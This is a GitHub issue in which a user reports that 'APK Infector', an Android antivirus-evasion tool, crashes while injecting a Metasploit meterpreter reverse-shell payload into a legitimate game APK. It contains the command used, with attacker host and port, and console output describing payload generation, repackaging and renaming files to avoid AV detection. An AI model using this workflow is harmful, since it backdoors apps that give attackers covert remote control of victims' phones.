Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Error decompiling legitimate apk #11

Open
ChillVibesMushroom opened this issue Sep 27, 2022 · 1 comment
Open

Error decompiling legitimate apk #11

ChillVibesMushroom opened this issue Sep 27, 2022 · 1 comment

Comments

@ChillVibesMushroom
Copy link

sudo python3 infector.py --lhost 192.168.1.24 --lport 4444 -n 'com.imangi.templerun_1.6.1-12_minAPI9(armeabi-v7a)(nodpi).apk' --apk-name Dique.apk

╔─────────────────────────────────────────────────────────╗
| APK Infector - Advanced Android AV Evasion TOOL |
| Please do not upload APK to VirusTotal.com |
┖─────────────────────────────────────────────────────────┙

              .           .           
              M.          .M          
               MMMMMMMMMMM.           
            .MMM\MMMMMMM/MMM.         
           .MMM.7MMMMMMM.7MMM.        
          .MMMMMMMMMMMMMMMMMMM        
          MMMMMMM.......MMMMMMM       
          MMMMMMMMMMMMMMMMMMMMM       
     MMMM MMMMMMMMMMMMMMMMMMMMM MMMM  
    dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD 
    dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD 
    dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD 
    dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD 
    dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD 
     MMM8 MMMMMMMMMMMMMMMMMMMMM 8MMM  
          MMMMMMMMMMMMMMMMMMMMM       
          MMMMMMMMMMMMMMMMMMMMM       
              MMMMM   MMMMM        APK Infector v1.0   
              MMMMM   MMMMM        Written In Python3   
              MMMMM   MMMMM           
              MMMMM   MMMMM           
              .MMM.   .MMM.           

╔──────────────────────────────────────────────────────────╗
| [ Author ] Pushpender Singh |
| [ GitHub ] https://github.com/PushpenderIndia |
| [ YouTube ] youtube.com/channel/UCRv-wp0CWtW2J33NkTId62w |
┖──────────────────────────────────────────────────────────┙

╔──────────────────────────────────────────────────────────╗
| DISCLAIMER : Illegal Use is Stricly Prohibited |
┖──────────────────────────────────────────────────────────┙

[*] Generating Random Variables which will be used in Ofustication
[+] Generated Successfully!

[*] Checking for Dependencies

[:] NOTE : Jarsigner or APKsigner is used to Sign APK, One of them must be installed on your System

[*] Checking : APKTool
[+] APKTool - OK

[*] Checking : Jarsigner
[+] Jarsigner - OK

[*] Checking : APKsigner
[+] APKsigner - OK

[*] Checking : ZipAlign
[+] ZipAlign - OK

====================================                                                                                                                              
[*] Available Types of Payload                                                                                                                                    
====================================                                                                                                                              
(1) android/meterpreter/reverse_tcp                                                                                                                               
(2) android/meterpreter/reverse_http                                                                                                                              
(3) android/meterpreter/reverse_https                                                                                                                             

[?] Which Type of Payload, You Want to Create (1/2/3): 1

[*] Creating Android Payload Using msfvenom
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10185 bytes

[+] Payload Created Successfully !

[?] Want to Create msfconsole handler.rc file (y/n): n

[*] Decompiling Normal/Legitimate APK

sh: 1: Syntax error: "(" unexpected
[!] Failed to Decompile Normal/Legitimate APK

[*] Decompiling Android Payload

I: Using Apktool 2.6.0 on android_payload.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values / XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
[!] Failed to Decompile Evil APK

[*] Changing default folder and filenames being flagged by AV
[+] Changed Successfully!

[*] Moving Meterpreter Payload to Normal/Legitimate APK
mv: cannot move '/opt/apkinfector/android_payload/smali/com/bmwnqptqpe' to '/opt/apkinfector/normal_apk/smali/com/': No such file or directory
[!] Failed to Move Evil Files to Normal/Legitimate APK

[*] Trying to Find .smali File of Launcher
grep: /opt/apkinfector/normal_apk/AndroidManifest.xml: No such file or directory
Traceback (most recent call last):
File "/opt/apkinfector/infector.py", line 322, in
hook_meterpreter_in_apk(VAR1, VAR2, VAR3)
File "/opt/apkinfector/infector.py", line 167, in hook_meterpreter_in_apk
lineNumber = int(lineNumber.decode().split('\n')[0]) - 1
ValueError: invalid literal for int() with base 10: '

@ChillVibesMushroom
Copy link
Author

all required tools are installed and its a clean install of apktool

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant